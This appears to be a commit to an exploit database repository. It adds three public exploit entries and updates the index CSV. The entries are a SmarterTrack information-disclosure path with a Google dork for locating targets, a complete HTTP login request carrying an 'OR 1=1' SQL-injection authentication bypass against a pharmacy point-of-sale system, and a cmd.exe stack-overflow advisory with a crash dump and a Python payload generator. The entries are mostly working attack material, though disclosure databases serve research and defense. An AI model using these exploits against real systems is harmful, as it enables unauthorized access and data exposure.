DB: 2021-09-25

3 changes to exploits/shellcodes Microsoft Windows cmd.exe - Stack Buffer Overflow SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass
2021-09-25 05:02:05 +00:00 · 2021-09-25 05:02:05 +00:00 · 7dffea89c5
commit 7dffea89c5
parent c18c22e3d9
4 changed files with 210 additions and 0 deletions
--- a/exploits/aspx/webapps/50328.txt
+++ b/exploits/aspx/webapps/50328.txt
@ -0,0 +1,12 @@
+# Exploit Title: SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure
+# Google Dork: intext:"Powered by SmarterTrack"
+# Date: 23/01/2020
+# Exploit Author: Andrei Manole
+# Vendor Homepage: https://www.smartertools.com/
+# Software Link: https://www.smartertools.com/smartertrack
+# Version: TESTED ON  10.x -> 14.x and to Build 7922 (set 9, 2021)
+# Tested on: Windows 10
+
+POC:
+VULNERABLE TARGET/Management/Chat/frmChatSearch.aspx
+This file disclosure all agents id and first name and second name
--- a/exploits/php/webapps/50329.txt
+++ b/exploits/php/webapps/50329.txt
@ -0,0 +1,26 @@
+# Exploit Title: Pharmacy Point of Sale System 1.0 - SQLi Authentication Bypass
+# Date: 23.09.2021
+# Exploit Author: Janik Wehrli
+# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
+# Version: 1.0
+# Tested on: Kali Linux, Windows 10
+
+# Pharmacy Point of Sale System v1.0 Login can be bypassed with a simple SQLi
+
+
+POST /pharmacy/Actions.php?a=login HTTP/1.1
+Host: 192.168.209.170
+Content-Length: 38
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.209.170
+Referer: http://192.168.209.170/pharmacy/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: de-CH,de-DE;q=0.9,de;q=0.8,en-US;q=0.7,en;q=0.6
+Cookie: PHPSESSID=c5mtnqpcavhfgsambtnh4uklag
+Connection: close
+
+username='OR+1%3D1+--+-&password=PWNED
--- a/exploits/windows/local/50331.txt
+++ b/exploits/windows/local/50331.txt
@ -0,0 +1,169 @@
+# Title: Microsoft Windows cmd.exe - Stack Buffer Overflow
+# Author: John Page (aka hyp3rlinx)
+# Date: 15/09/2021
+# Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
+# ISR: ApparitionSec
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems.
+
+
+[Vulnerability Type]
+Stack Buffer Overflow
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition.
+
+E.g. cmd.exe /c <PAYLOAD>.
+
+[Memory Dump]
+(660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
+ntdll!ZwWaitForMultipleObjects+0x14:
+00007ffb`00a809d4 c3              ret
+
+
+0:000> .ecxr
+rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
+rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
+rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
+r8=000000000000200c  r9=00007ff7c0e60520 r10=0000000000000000
+r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
+r14=000002e34d796890 r15=000000000000200d
+iopl=0         nv up ei pl nz na pe nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+cmd!StripQuotes+0xa8:
+00007ff7`c0e214f8 cc              int     3
+
+0:000> !analyze -v
+*******************************************************************************
+*                                                                             *
+
+*                        Exception Analysis                                   *
+
+*                                                                             *
+*******************************************************************************
+
+Failed calling InternetOpenUrl, GLE=12029
+
+FAULTING_IP:
+cmd!StripQuotes+a8
+00007ff7`c0e214f8 cc              int     3
+
+
+EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
+ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
+   ExceptionCode: c0000409 (Stack buffer overflow)
+  ExceptionFlags: 00000001
+NumberParameters: 1
+   Parameter[0]: 0000000000000008
+
+PROCESS_NAME:  cmd.exe
+
+ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
+
+EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
+
+EXCEPTION_PARAMETER1:  0000000000000008
+
+MOD_LIST: <ANALYSIS/>
+
+NTGLOBALFLAG:  0
+
+APPLICATION_VERIFIER_FLAGS:  0
+
+FAULTING_THREAD:  00000000000012d4
+
+BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE
+
+PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE
+
+DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE
+
+LAST_CONTROL_TRANSFER:  from 00007ffafcfca9c6 to 00007ffb00a809d4
+
+STACK_TEXT:
+000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
+000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106
+000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
+000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce
+000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73
+000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
+000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
+000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
+000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
+000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
+000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69
+000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de
+000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5
+000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa
+000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289
+000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
+000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
+
+FOLLOWUP_IP:
+cmd!StripQuotes+a8
+00007ff7`c0e214f8 cc              int     3
+
+SYMBOL_STACK_INDEX:  8
+
+SYMBOL_NAME:  cmd!StripQuotes+a8
+
+FOLLOWUP_NAME:  MachineOwner
+
+MODULE_NAME: cmd
+
+IMAGE_NAME:  cmd.exe
+
+DEBUG_FLR_IMAGE_TIMESTAMP:  0
+
+STACK_COMMAND:  ~0s ; kb
+
+FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes
+
+BUCKET_ID:  X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8
+
+
+[Exploit/POC]
+PAYLOAD=chr(235) + "\\CC"
+PAYLOAD = PAYLOAD * 3000
+
+with open("hate.cmd", "w") as f:
+    f.write(PAYLOAD)
+
+
+[Network Access]
+Local
+
+
+[Video PoC URL]
+https://www.youtube.com/watch?v=wYYgjV-PzD8
+
+
+[Severity]
+Low
+
+
+[Disclosure Timeline]
+Vendor Notification: Requires running dangerous file types already.
+
+September 15, 2021 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11391,6 +11391,7 @@ id,file,description,date,author,type,platform,port
 50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
 50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",1970-01-01,Neurogenesia,local,hardware,
 50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python,
+50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",1970-01-01,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44444,3 +44445,5 @@ id,file,description,date,author,type,platform,port
 50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php,
 50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php,
 50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php,
+50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx,
+50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,